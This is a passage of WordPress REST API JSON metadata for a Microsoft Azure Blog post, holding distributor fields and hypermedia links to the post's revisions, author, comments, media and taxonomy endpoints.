null,"distributor_meta":false,"distributor_terms":false,"distributor_media":false,"distributor_original_site_name":"Microsoft Azure Blog","distributor_original_site_url":"https:\/\/azure.microsoft.com\/en-us\/blog","push-errors":false,"_links":{"self":[{"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/posts\/805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/comments?post=805"}],"version-history":[{"count":1,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/posts\/805\/revisions"}],"predecessor-version":[{"id":44235,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/posts\/805\/revisions\/44235"}],"wp:attachment":[{"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/media?parent=805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/categories?post=805"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/tags?post=805"},{"taxonomy":"audience","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/audience?post=805"},{"taxonomy":"content-type","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/content-type?post=805"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/product?post=805"},{"taxonomy":"tech-community","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/tech-community?post=805"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/topic?post=805"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-json\/wp\/v2\/coauthors?post=805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}